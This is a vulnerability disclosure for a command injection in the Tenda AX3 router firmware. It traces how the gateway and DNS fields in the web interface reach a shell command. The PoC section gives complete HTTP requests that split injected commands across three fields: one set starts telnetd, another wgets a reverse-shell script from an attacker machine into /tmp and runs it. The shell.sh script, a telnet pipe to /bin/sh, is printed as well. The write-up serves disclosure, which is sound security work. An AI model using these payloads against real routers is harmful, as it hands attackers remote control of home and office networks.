# Tenda Vulnerability

Vendor:Tenda

Product:AX3

Version:V16.03.12.10_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn



## Vulnerability description

We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `httpd` binary:

In `WanParameterSetting` function, `gateway、dns1、dns2` is directly passed by the attacker, so we can control the `gateway、dns1、dns2` to attack the OS.

First, make corresponding settings according to the selected network mode. This vulnerability occurs in the `setStaticConfig` function. We mainly explain the data flow of this part.

Here, enter the function formWanInfoSet for the next data flow tracking.

<div  align="center"><img src="./images/1.png" style="zoom:80%;" /></div>

The part that gets the user input is in the function `setStaticConfig`.

<div  align="center"><img src="./images/2.png" style="zoom:80%;" /></div>

As you can see here, the input has not been checked. And then, call the function `SetValue ` to store this input.

<div  align="center"><img src="./images/3.png" style="zoom:80%;" /></div>

This step is mainly for inter-process communication, the vulnerability will be triggered in another binary file.

<div  align="center"><img src="./images/4.png" style="zoom:80%;" /></div>

If the semaphore op for inter-process communication is 15, the vulnerability will be triggered.

<div  align="center"><img src="./images/5.png" style="zoom:80%;" /></div>

In `netctrl` binary:

In `wifi_get_wisp_cfg_by_mode` function, the initial input will be extracted.

<div  align="center"><img src="./images/6.png" style="zoom:80%;" /></div>

Eventually, in `wifi_get_wisp_cfg_by_mode` function, the initial input will cause command injection.

<div  align="center"><img src="./images/7.png" style="zoom:80%;" /></div>

**Supplement**

<div  align="center"><img src="./images/8.png" style="zoom:80%;" /></div>

We observed that `wisp_gw, wisp_dns1, and wisp_dns1` are located in the structure and have a limited length. If we want to send only one packet to complete command injection, we can splicing the contents of these three fields to form an attack vector, as shown below.

<div  align="center"><img src="./images/9.png" style="zoom:80%;" /></div>

There may be some doubts here, why not directly fill wisp_gw with the above content? Because if all command content is placed in wisp_gw, the \0 character will be copied when wisp_dns1 is copied, and command injection cannot be completed at one time.

<div  align="center"><img src="./images/10.png" style="zoom:80%;" /></div>

> Here is an example of opening the telnet port, the length here is enough to inject any type of command



## PoC

**Open telnet service:**

gateway=192.168.0.1`teln&dns1=etd`&dns2=8.8.8.8

```http
POST /goform/WanParameterSetting?0.4898712334661075 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 202
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/main.html
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0iszcvb

wanType=1&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=192.168.0.10&mask=255.255.255.0&gateway=192.168.0.1`teln&dns1=etd`&dns2=8.8.8.8&module=wan1&downSpeedLimit=
```

<div  align="center"><img src="./images/11.png" style="zoom:80%;" /></div>

**Get a shell:**

> Multiple command injection
>
> As the `busybox` instance on the router supports `wget`, we can download a reverse shell to the `/tmp` folder. 

shell.sh:
```shell
#! /bin/sh
telnet 192.168.1.107 5555 | /bin/sh | telnet 192.168.1.107 6666
```


gateway=;wget -P /tmp ft&dns1=p://192.168.1.11&dns2=5/shell.sh;

gateway=;chmod 777 /tmp/&dns1=shell.sh;/tmp/sh&dns2=ell.sh;

The meaning of the above command is:

* **;wget -P /tmp ftp://192.168.1.115/shell.sh;**

* **;chmod 777 /tmp/shell.sh;/tmp/shell.sh;**

Then,listening on ports 5555 and 6666.

```http
POST /goform/WanParameterSetting?0.35473050502276804 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 224
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/main.html
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0puocvb

wanType=1&adslUser=157&adslPwd=123123123&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=192.168.0.10&mask=255.255.255.0&gateway=;wget -P /tmp ft&dns1=p://192.168.1.11&dns2=5/shell.sh;&module=wan1&downSpeedLimit=
```

```http
POST /goform/WanParameterSetting?0.35473050502276804 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 220
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/main.html
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0puocvb

wanType=1&adslUser=157&adslPwd=123123123&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=192.168.0.10&mask=255.255.255.0&gateway=;chmod 777 /tmp/&dns1=shell.sh;/tmp/sh&dns2=ell.sh;&module=wan1&downSpeedLimit=
```



## Result

The target router has enabled the telnet service.

<div  align="center"><img src="./images/12.png" style="zoom:80%;" />


Get a Shell！

<div  align="center"><img src="./images/13.png" style="zoom:80%;" />
